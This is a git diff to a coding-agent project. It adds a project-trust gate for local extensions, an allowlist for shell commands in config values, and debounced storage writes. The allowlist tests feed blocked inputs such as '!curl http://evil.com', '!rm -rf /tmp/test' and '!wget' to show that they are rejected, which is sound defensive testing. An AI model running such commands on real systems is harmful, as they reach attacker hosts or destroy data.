diff --git a/packages/pi-coding-agent/src/core/extensions/index.ts b/packages/pi-coding-agent/src/core/extensions/index.ts index 39b4a66e4..1e5938a79 100644 --- a/packages/pi-coding-agent/src/core/extensions/index.ts +++ b/packages/pi-coding-agent/src/core/extensions/index.ts @@ -6,8 +6,11 @@ export type { SlashCommandInfo, SlashCommandLocation, SlashCommandSource } from export { createExtensionRuntime, discoverAndLoadExtensions, + getUntrustedExtensionPaths, + isProjectTrusted, loadExtensionFromFactory, loadExtensions, + trustProject, } from "./loader.js"; export type { ExtensionErrorListener, diff --git a/packages/pi-coding-agent/src/core/extensions/loader.test.ts b/packages/pi-coding-agent/src/core/extensions/loader.test.ts new file mode 100644 index 000000000..ef98c1189 --- /dev/null +++ b/packages/pi-coding-agent/src/core/extensions/loader.test.ts @@ -0,0 +1,141 @@ +import { describe, it, beforeEach, afterEach } from "node:test"; +import assert from "node:assert/strict"; +import * as fs from "node:fs"; +import * as os from "node:os"; +import * as path from "node:path"; +import { isProjectTrusted, trustProject, getUntrustedExtensionPaths } from "./project-trust.js"; + +// ─── helpers ────────────────────────────────────────────────────────────────── + +function makeTempDir(): string { + return fs.mkdtempSync(path.join(os.tmpdir(), "loader-test-")); +} + +function cleanDir(dir: string): void { + fs.rmSync(dir, { recursive: true, force: true }); +} + +// ─── isProjectTrusted ───────────────────────────────────────────────────────── + +describe("isProjectTrusted", () => { + let agentDir: string; + + beforeEach(() => { + agentDir = makeTempDir(); + }); + + afterEach(() => { + cleanDir(agentDir); + }); + + it("returns false when no trusted-projects.json exists", () => { + assert.equal(isProjectTrusted("/some/project", agentDir), false); + }); + + it("returns false for an untrusted project path", () => { + trustProject("/trusted/project", agentDir); + assert.equal(isProjectTrusted("/other/project", agentDir), false); + }); + + it("returns true after trustProject is called for that path", () => { + trustProject("/trusted/project", agentDir); + assert.equal(isProjectTrusted("/trusted/project", agentDir), true); + }); + + it("canonicalizes paths before comparison (trailing slash)", () => { + trustProject("/my/project/", agentDir); + assert.equal(isProjectTrusted("/my/project", agentDir), true); + }); + + it("returns false when trusted-projects.json is malformed JSON", () => { + fs.mkdirSync(agentDir, { recursive: true }); + fs.writeFileSync(path.join(agentDir, "trusted-projects.json"), "not json"); + assert.equal(isProjectTrusted("/any/project", agentDir), false); + }); + + it("returns false when trusted-projects.json contains non-array", () => { + fs.mkdirSync(agentDir, { recursive: true }); + fs.writeFileSync(path.join(agentDir, "trusted-projects.json"), JSON.stringify({ foo: "bar" })); + assert.equal(isProjectTrusted("/any/project", agentDir), false); + }); +}); + +// ─── trustProject ───────────────────────────────────────────────────────────── + +describe("trustProject", () => { + let agentDir: string; + + beforeEach(() => { + agentDir = makeTempDir(); + }); + + afterEach(() => { + cleanDir(agentDir); + }); + + it("creates agentDir if it does not exist", () => { + const nested = path.join(agentDir, "deeply", "nested"); + trustProject("/a/project", nested); + assert.ok(fs.existsSync(nested)); + }); + + it("persists the trusted path to trusted-projects.json", () => { + trustProject("/a/project", agentDir); + const content = JSON.parse(fs.readFileSync(path.join(agentDir, "trusted-projects.json"), "utf-8")); + assert.ok(Array.isArray(content)); + assert.ok(content.includes(path.resolve("/a/project"))); + }); + + it("accumulates multiple trusted projects", () => { + trustProject("/project/one", agentDir); + trustProject("/project/two", agentDir); + const content = JSON.parse(fs.readFileSync(path.join(agentDir, "trusted-projects.json"), "utf-8")); + assert.equal(content.length, 2); + }); + + it("does not duplicate already-trusted paths", () => { + trustProject("/project/one", agentDir); + trustProject("/project/one", agentDir); + const content = JSON.parse(fs.readFileSync(path.join(agentDir, "trusted-projects.json"), "utf-8")); + assert.equal(content.length, 1); + }); +}); + +// ─── getUntrustedExtensionPaths ─────────────────────────────────────────────── + +describe("getUntrustedExtensionPaths", () => { + let agentDir: string; + + beforeEach(() => { + agentDir = makeTempDir(); + }); + + afterEach(() => { + cleanDir(agentDir); + }); + + it("returns all paths when project is not trusted", () => { + const paths = ["/proj/.pi/extensions/a.ts", "/proj/.pi/extensions/b.ts"]; + const result = getUntrustedExtensionPaths("/proj", paths, agentDir); + assert.deepEqual(result, paths); + }); + + it("returns empty array when project is trusted", () => { + trustProject("/proj", agentDir); + const paths = ["/proj/.pi/extensions/a.ts", "/proj/.pi/extensions/b.ts"]; + const result = getUntrustedExtensionPaths("/proj", paths, agentDir); + assert.deepEqual(result, []); + }); + + it("returns empty array when extension paths list is empty regardless of trust", () => { + const result = getUntrustedExtensionPaths("/proj", [], agentDir); + assert.deepEqual(result, []); + }); + + it("trusting one project does not affect another", () => { + trustProject("/project/a", agentDir); + const paths = ["/project/b/.pi/extensions/evil.ts"]; + const result = getUntrustedExtensionPaths("/project/b", paths, agentDir); + assert.deepEqual(result, paths); + }); +}); diff --git a/packages/pi-coding-agent/src/core/extensions/loader.ts b/packages/pi-coding-agent/src/core/extensions/loader.ts index 60877917f..90ff9b4fc 100644 --- a/packages/pi-coding-agent/src/core/extensions/loader.ts +++ b/packages/pi-coding-agent/src/core/extensions/loader.ts @@ -27,6 +27,8 @@ import * as _bundledPiCodingAgent from "../../index.js"; import { createEventBus, type EventBus } from "../event-bus.js"; import type { ExecOptions } from "../exec.js"; import { execCommand } from "../exec.js"; +import { getUntrustedExtensionPaths } from "./project-trust.js"; +export { isProjectTrusted, trustProject, getUntrustedExtensionPaths } from "./project-trust.js"; import type { Extension, ExtensionAPI, @@ -538,8 +540,19 @@ export async function discoverAndLoadExtensions( }; // 1. Project-local extensions: cwd/.pi/extensions/ + // Only loaded when the project path has been explicitly trusted (TOFU model). const localExtDir = path.join(cwd, ".pi", "extensions"); - addPaths(discoverExtensionsInDir(localExtDir)); + const localDiscovered = discoverExtensionsInDir(localExtDir); + if (localDiscovered.length > 0) { + const untrusted = getUntrustedExtensionPaths(cwd, localDiscovered, agentDir); + if (untrusted.length > 0) { + process.stderr.write( + `[pi] Skipping ${untrusted.length} project-local extension(s) in ${localExtDir} — project not trusted. Use trustProject() to enable.\n`, + ); + } + const trusted = localDiscovered.filter((p) => !untrusted.includes(p)); + addPaths(trusted); + } // 2. Global extensions: agentDir/extensions/ const globalExtDir = path.join(agentDir, "extensions"); diff --git a/packages/pi-coding-agent/src/core/extensions/project-trust.ts b/packages/pi-coding-agent/src/core/extensions/project-trust.ts new file mode 100644 index 000000000..e385ea3e9 --- /dev/null +++ b/packages/pi-coding-agent/src/core/extensions/project-trust.ts @@ -0,0 +1,51 @@ +import * as fs from "node:fs"; +import * as path from "node:path"; + +const TRUSTED_PROJECTS_FILE = "trusted-projects.json"; + +function getTrustedProjectsPath(agentDir: string): string { + return path.join(agentDir, TRUSTED_PROJECTS_FILE); +} + +function readTrustedProjects(agentDir: string): Set { + const filePath = getTrustedProjectsPath(agentDir); + try { + const content = fs.readFileSync(filePath, "utf-8"); + const parsed = JSON.parse(content); + if (Array.isArray(parsed)) { + return new Set(parsed.filter((p) => typeof p === "string")); + } + } catch { + // File missing or malformed — start with empty set + } + return new Set(); +} + +function writeTrustedProjects(agentDir: string, trusted: Set): void { + const filePath = getTrustedProjectsPath(agentDir); + fs.mkdirSync(agentDir, { recursive: true }); + fs.writeFileSync(filePath, JSON.stringify([...trusted], null, 2), "utf-8"); +} + +export function isProjectTrusted(projectPath: string, agentDir: string): boolean { + const canonical = path.resolve(projectPath); + return readTrustedProjects(agentDir).has(canonical); +} + +export function trustProject(projectPath: string, agentDir: string): void { + const canonical = path.resolve(projectPath); + const trusted = readTrustedProjects(agentDir); + trusted.add(canonical); + writeTrustedProjects(agentDir, trusted); +} + +export function getUntrustedExtensionPaths( + projectPath: string, + extensionPaths: string[], + agentDir: string, +): string[] { + if (isProjectTrusted(projectPath, agentDir)) { + return []; + } + return extensionPaths; +} diff --git a/packages/pi-coding-agent/src/core/resolve-config-value.test.ts b/packages/pi-coding-agent/src/core/resolve-config-value.test.ts new file mode 100644 index 000000000..ea9899f88 --- /dev/null +++ b/packages/pi-coding-agent/src/core/resolve-config-value.test.ts @@ -0,0 +1,132 @@ +import { describe, it, beforeEach } from "node:test"; +import assert from "node:assert/strict"; +import { + resolveConfigValue, + clearConfigValueCache, + SAFE_COMMAND_PREFIXES, +} from "./resolve-config-value.js"; + +beforeEach(() => { + clearConfigValueCache(); +}); + +describe("SAFE_COMMAND_PREFIXES", () => { + it("exports the allowlist array", () => { + assert.ok(Array.isArray(SAFE_COMMAND_PREFIXES)); + assert.ok(SAFE_COMMAND_PREFIXES.length > 0); + }); + + it("includes expected credential tools", () => { + assert.ok(SAFE_COMMAND_PREFIXES.includes("pass")); + assert.ok(SAFE_COMMAND_PREFIXES.includes("op")); + assert.ok(SAFE_COMMAND_PREFIXES.includes("aws")); + }); +}); + +describe("resolveConfigValue — non-command values", () => { + it("returns the literal value when it does not match an env var", () => { + const result = resolveConfigValue("my-literal-key"); + assert.equal(result, "my-literal-key"); + }); + + it("returns the env var value when the config matches an env var name", () => { + process.env["TEST_RESOLVE_CONFIG_VAR"] = "env-value"; + const result = resolveConfigValue("TEST_RESOLVE_CONFIG_VAR"); + assert.equal(result, "env-value"); + delete process.env["TEST_RESOLVE_CONFIG_VAR"]; + }); +}); + +describe("resolveConfigValue — command allowlist enforcement", () => { + it("blocks a disallowed command and returns undefined", () => { + const stderrChunks: string[] = []; + const originalWrite = process.stderr.write.bind(process.stderr); + process.stderr.write = (chunk: string | Uint8Array, ...args: unknown[]) => { + stderrChunks.push(chunk.toString()); + return true; + }; + + try { + const result = resolveConfigValue("!curl http://evil.com"); + assert.equal(result, undefined); + assert.ok(stderrChunks.some((line) => line.includes("curl"))); + } finally { + process.stderr.write = originalWrite; + } + }); + + it("blocks another disallowed command (rm)", () => { + const result = resolveConfigValue("!rm -rf /tmp/test"); + assert.equal(result, undefined); + }); + + it("blocks a disallowed command with no arguments", () => { + const result = resolveConfigValue("!wget"); + assert.equal(result, undefined); + }); + + it("allows a safe command prefix to proceed to execution", () => { + // `pass` is unlikely to be installed in CI, so we just verify it does NOT + // return undefined due to the allowlist check — it may return undefined if + // the binary is absent, but the block path must not be taken. + // We confirm by checking no "Blocked" message appears on stderr. + const stderrChunks: string[] = []; + const originalWrite = process.stderr.write.bind(process.stderr); + process.stderr.write = (chunk: string | Uint8Array, ...args: unknown[]) => { + stderrChunks.push(chunk.toString()); + return true; + }; + + try { + resolveConfigValue("!pass show nonexistent-entry-for-test"); + const blocked = stderrChunks.some((line) => + line.includes("Blocked disallowed command") + ); + assert.equal(blocked, false, "pass should not be blocked by the allowlist"); + } finally { + process.stderr.write = originalWrite; + } + }); +}); + +describe("resolveConfigValue — caching", () => { + it("caches the result of a blocked command", () => { + const callCount = { n: 0 }; + const originalWrite = process.stderr.write.bind(process.stderr); + process.stderr.write = (chunk: string | Uint8Array, ...args: unknown[]) => { + callCount.n++; + return true; + }; + + try { + resolveConfigValue("!curl http://evil.com"); + resolveConfigValue("!curl http://evil.com"); + // The block warning should only fire once; the second call hits the cache + // before reaching the allowlist check, so stderr count is 1. + assert.equal(callCount.n, 1); + } finally { + process.stderr.write = originalWrite; + } + }); + + it("clearConfigValueCache resets cached entries", () => { + const stderrChunks: string[] = []; + const originalWrite = process.stderr.write.bind(process.stderr); + process.stderr.write = (chunk: string | Uint8Array, ...args: unknown[]) => { + stderrChunks.push(chunk.toString()); + return true; + }; + + try { + resolveConfigValue("!curl http://evil.com"); + assert.equal(stderrChunks.length, 1); + + clearConfigValueCache(); + + resolveConfigValue("!curl http://evil.com"); + assert.equal(stderrChunks.length, 2); + } finally { + process.stderr.write = originalWrite; + } + }); +}); diff --git a/packages/pi-coding-agent/src/core/resolve-config-value.ts b/packages/pi-coding-agent/src/core/resolve-config-value.ts index da127869b..3b3395ef3 100644 --- a/packages/pi-coding-agent/src/core/resolve-config-value.ts +++ b/packages/pi-coding-agent/src/core/resolve-config-value.ts @@ -8,6 +8,19 @@ import { execSync } from "child_process"; // Cache for shell command results (persists for process lifetime) const commandResultCache = new Map(); +export const SAFE_COMMAND_PREFIXES = [ + "pass", + "op", + "aws", + "gcloud", + "vault", + "security", + "gpg", + "bw", + "gopass", + "lpass", +]; + /** * Resolve a config value (API key, header value, etc.) to an actual value. * - If starts with "!", executes the rest as a shell command and uses stdout (cached) @@ -27,6 +40,13 @@ function executeCommand(commandConfig: string): string | undefined { } const command = commandConfig.slice(1); + const firstToken = command.split(/\s+/)[0]; + if (!SAFE_COMMAND_PREFIXES.includes(firstToken)) { + process.stderr.write(`[resolve-config-value] Blocked disallowed command: "${firstToken}". Allowed: ${SAFE_COMMAND_PREFIXES.join(", ")}\n`); + commandResultCache.set(commandConfig, undefined); + return undefined; + } + let result: string | undefined; try { const output = execSync(command, { diff --git a/packages/pi-coding-agent/src/resources/extensions/memory/storage.test.ts b/packages/pi-coding-agent/src/resources/extensions/memory/storage.test.ts new file mode 100644 index 000000000..f31a40b7b --- /dev/null +++ b/packages/pi-coding-agent/src/resources/extensions/memory/storage.test.ts @@ -0,0 +1,98 @@ +import assert from "node:assert/strict"; +import { describe, it, mock } from "node:test"; +import { mkdtempSync, rmSync, readFileSync, existsSync } from "node:fs"; +import { join } from "node:path"; +import { tmpdir } from "node:os"; + +import { MemoryStorage } from "./storage.js"; + +function makeTmpDir(): string { + return mkdtempSync(join(tmpdir(), "gsd-memory-storage-test-")); +} + +function wait(ms: number): Promise { + return new Promise((resolve) => setTimeout(resolve, ms)); +} + +describe("MemoryStorage debounced persistence", () => { + it("multiple rapid mutations only trigger one persist write", async () => { + const dir = makeTmpDir(); + const dbPath = join(dir, "test.db"); + try { + const storage = await MemoryStorage.create(dbPath); + + const initialStat = readFileSync(dbPath); + const initialMtime = initialStat.length; + + storage.upsertThreads([ + { threadId: "t1", filePath: "/a.txt", fileSize: 100, fileMtime: 1000, cwd: "/proj" }, + ]); + storage.upsertThreads([ + { threadId: "t2", filePath: "/b.txt", fileSize: 200, fileMtime: 2000, cwd: "/proj" }, + ]); + storage.upsertThreads([ + { threadId: "t3", filePath: "/c.txt", fileSize: 300, fileMtime: 3000, cwd: "/proj" }, + ]); + + const afterMutationsBuf = readFileSync(dbPath); + assert.deepEqual( + afterMutationsBuf, + initialStat, + "File should not have been written yet (debounce window has not elapsed)", + ); + + await wait(700); + + const afterDebounceBuf = readFileSync(dbPath); + assert.notDeepEqual( + afterDebounceBuf, + initialStat, + "File should have been written after debounce window elapsed", + ); + + const stats = storage.getStats(); + assert.equal(stats.totalThreads, 3); + + storage.close(); + } finally { + rmSync(dir, { recursive: true, force: true }); + } + }); + + it("close() flushes pending changes immediately without waiting for debounce", async () => { + const dir = makeTmpDir(); + const dbPath = join(dir, "test.db"); + try { + const storage = await MemoryStorage.create(dbPath); + + const initialBuf = readFileSync(dbPath); + + storage.upsertThreads([ + { threadId: "t1", filePath: "/a.txt", fileSize: 100, fileMtime: 1000, cwd: "/proj" }, + ]); + + const beforeCloseBuf = readFileSync(dbPath); + assert.deepEqual( + beforeCloseBuf, + initialBuf, + "File should not have been written yet (debounce window has not elapsed)", + ); + + storage.close(); + + const afterCloseBuf = readFileSync(dbPath); + assert.notDeepEqual( + afterCloseBuf, + initialBuf, + "File should have been written immediately on close()", + ); + + const reopened = await MemoryStorage.create(dbPath); + const stats = reopened.getStats(); + assert.equal(stats.totalThreads, 1, "Data should be persisted and readable after close"); + reopened.close(); + } finally { + rmSync(dir, { recursive: true, force: true }); + } + }); +}); diff --git a/packages/pi-coding-agent/src/resources/extensions/memory/storage.ts b/packages/pi-coding-agent/src/resources/extensions/memory/storage.ts index dae388960..d1b979111 100644 --- a/packages/pi-coding-agent/src/resources/extensions/memory/storage.ts +++ b/packages/pi-coding-agent/src/resources/extensions/memory/storage.ts @@ -46,6 +46,7 @@ export interface JobRow { export class MemoryStorage { private db: SqlJsDatabase; private dbPath: string; + private persistTimer: ReturnType | null = null; private constructor(db: SqlJsDatabase, dbPath: string) { this.db = db; @@ -76,6 +77,16 @@ export class MemoryStorage { writeFileSync(this.dbPath, Buffer.from(data)); } + private schedulePersist(): void { + if (this.persistTimer) { + clearTimeout(this.persistTimer); + } + this.persistTimer = setTimeout(() => { + this.persistTimer = null; + this.persist(); + }, 500); + } + private initSchema(): void { this.db.run(` CREATE TABLE IF NOT EXISTS threads ( @@ -184,7 +195,7 @@ export class MemoryStorage { } } - this.persist(); + this.schedulePersist(); return { inserted, updated, skipped }; } @@ -221,7 +232,7 @@ export class MemoryStorage { [token], ); - this.persist(); + this.schedulePersist(); return rows.map((r) => ({ jobId: r.id, @@ -246,7 +257,7 @@ export class MemoryStorage { "UPDATE threads SET status = 'done', updated_at = datetime('now') WHERE thread_id = ?", [threadId], ); - this.persist(); + this.schedulePersist(); } /** @@ -261,7 +272,7 @@ export class MemoryStorage { "UPDATE threads SET status = 'error', error_message = ?, updated_at = datetime('now') WHERE thread_id = ?", [errorMessage, threadId], ); - this.persist(); + this.schedulePersist(); } /** @@ -305,7 +316,7 @@ export class MemoryStorage { [jobId, workerId, token, expiresAt], ); - this.persist(); + this.schedulePersist(); return { jobId, ownershipToken: token }; } @@ -317,7 +328,7 @@ export class MemoryStorage { "UPDATE jobs SET status = 'done', updated_at = datetime('now') WHERE id = ? AND phase = 'stage2'", [jobId], ); - this.persist(); + this.schedulePersist(); } /** @@ -406,7 +417,7 @@ export class MemoryStorage { this.db.run("DELETE FROM stage1_outputs"); this.db.run("DELETE FROM jobs"); this.db.run("DELETE FROM threads"); - this.persist(); + this.schedulePersist(); } /** @@ -422,7 +433,7 @@ export class MemoryStorage { [cwd], ); this.db.run("DELETE FROM threads WHERE cwd = ?", [cwd]); - this.persist(); + this.schedulePersist(); } /** @@ -453,10 +464,14 @@ export class MemoryStorage { [randomUUID(), t.thread_id], ); } - this.persist(); + this.schedulePersist(); } close(): void { + if (this.persistTimer) { + clearTimeout(this.persistTimer); + this.persistTimer = null; + } this.persist(); this.db.close(); } diff --git a/src/onboarding.ts b/src/onboarding.ts index 7c649530d..2d858c0d8 100644 --- a/src/onboarding.ts +++ b/src/onboarding.ts @@ -933,32 +933,3 @@ async function runDiscordChannelStep(p: ClackModule, pc: PicoModule, token: stri return channelName ?? null } -// ─── Env hydration (migrated from wizard.ts) ───────────────────────────────── - -/** - * Hydrate process.env from stored auth.json credentials for optional tool keys. - * Runs on every launch so extensions see Brave/Context7/Jina keys stored via the - * wizard on prior launches. - */ -export function loadStoredEnvKeys(authStorage: AuthStorage): void { - const providers: Array<[string, string]> = [ - ['brave', 'BRAVE_API_KEY'], - ['brave_answers', 'BRAVE_ANSWERS_KEY'], - ['context7', 'CONTEXT7_API_KEY'], - ['jina', 'JINA_API_KEY'], - ['slack_bot', 'SLACK_BOT_TOKEN'], - ['discord_bot', 'DISCORD_BOT_TOKEN'], - ['telegram_bot', 'TELEGRAM_BOT_TOKEN'], - ['groq', 'GROQ_API_KEY'], - ['ollama-cloud', 'OLLAMA_API_KEY'], - ['custom-openai', 'CUSTOM_OPENAI_API_KEY'], - ] - for (const [provider, envVar] of providers) { - if (!process.env[envVar]) { - const cred = authStorage.get(provider) - if (cred?.type === 'api_key' && cred.key) { - process.env[envVar] = cred.key - } - } - } -} diff --git a/src/tests/app-smoke.test.ts b/src/tests/app-smoke.test.ts index 69893d360..6e36ae2b2 100644 --- a/src/tests/app-smoke.test.ts +++ b/src/tests/app-smoke.test.ts @@ -173,19 +173,21 @@ test("loadStoredEnvKeys hydrates process.env from auth.json", async () => { brave_answers: { type: "api_key", key: "test-answers-key" }, context7: { type: "api_key", key: "test-ctx7-key" }, tavily: { type: "api_key", key: "test-tavily-key" }, + telegram_bot: { type: "api_key", key: "test-telegram-key" }, + "custom-openai": { type: "api_key", key: "test-custom-openai-key" }, })); // Clear any existing env vars - const origBrave = process.env.BRAVE_API_KEY; - const origBraveAnswers = process.env.BRAVE_ANSWERS_KEY; - const origCtx7 = process.env.CONTEXT7_API_KEY; - const origJina = process.env.JINA_API_KEY; - const origTavily = process.env.TAVILY_API_KEY; - delete process.env.BRAVE_API_KEY; - delete process.env.BRAVE_ANSWERS_KEY; - delete process.env.CONTEXT7_API_KEY; - delete process.env.JINA_API_KEY; - delete process.env.TAVILY_API_KEY; + const envVarsToRestore = [ + "BRAVE_API_KEY", "BRAVE_ANSWERS_KEY", "CONTEXT7_API_KEY", + "JINA_API_KEY", "TAVILY_API_KEY", "TELEGRAM_BOT_TOKEN", + "CUSTOM_OPENAI_API_KEY", + ]; + const origValues: Record = {}; + for (const v of envVarsToRestore) { + origValues[v] = process.env[v]; + delete process.env[v]; + } try { const auth = AuthStorage.create(authPath); @@ -196,13 +198,12 @@ test("loadStoredEnvKeys hydrates process.env from auth.json", async () => { assert.equal(process.env.CONTEXT7_API_KEY, "test-ctx7-key", "CONTEXT7_API_KEY hydrated"); assert.equal(process.env.JINA_API_KEY, undefined, "JINA_API_KEY not set (not in auth)"); assert.equal(process.env.TAVILY_API_KEY, "test-tavily-key", "TAVILY_API_KEY hydrated"); + assert.equal(process.env.TELEGRAM_BOT_TOKEN, "test-telegram-key", "TELEGRAM_BOT_TOKEN hydrated"); + assert.equal(process.env.CUSTOM_OPENAI_API_KEY, "test-custom-openai-key", "CUSTOM_OPENAI_API_KEY hydrated"); } finally { - // Restore original env - if (origBrave) process.env.BRAVE_API_KEY = origBrave; else delete process.env.BRAVE_API_KEY; - if (origBraveAnswers) process.env.BRAVE_ANSWERS_KEY = origBraveAnswers; else delete process.env.BRAVE_ANSWERS_KEY; - if (origCtx7) process.env.CONTEXT7_API_KEY = origCtx7; else delete process.env.CONTEXT7_API_KEY; - if (origJina) process.env.JINA_API_KEY = origJina; else delete process.env.JINA_API_KEY; - if (origTavily) process.env.TAVILY_API_KEY = origTavily; else delete process.env.TAVILY_API_KEY; + for (const v of envVarsToRestore) { + if (origValues[v]) process.env[v] = origValues[v]; else delete process.env[v]; + } rmSync(tmp, { recursive: true, force: true }); } }); diff --git a/src/tool-bootstrap.ts b/src/tool-bootstrap.ts index 349133250..84c80cce5 100644 --- a/src/tool-bootstrap.ts +++ b/src/tool-bootstrap.ts @@ -33,7 +33,8 @@ function getCandidateNames(name: string): string[] { function isRegularFile(path: string): boolean { try { - return lstatSync(path).isFile() || lstatSync(path).isSymbolicLink(); + const stat = lstatSync(path); + return stat.isFile() || stat.isSymbolicLink(); } catch { return false; } diff --git a/src/wizard.ts b/src/wizard.ts index d28a05c58..1b11e1e8d 100644 --- a/src/wizard.ts +++ b/src/wizard.ts @@ -16,8 +16,10 @@ export function loadStoredEnvKeys(authStorage: AuthStorage): void { ['tavily', 'TAVILY_API_KEY'], ['slack_bot', 'SLACK_BOT_TOKEN'], ['discord_bot', 'DISCORD_BOT_TOKEN'], + ['telegram_bot', 'TELEGRAM_BOT_TOKEN'], ['groq', 'GROQ_API_KEY'], ['ollama-cloud', 'OLLAMA_API_KEY'], + ['custom-openai', 'CUSTOM_OPENAI_API_KEY'], ] for (const [provider, envVar] of providers) { if (!process.env[envVar]) {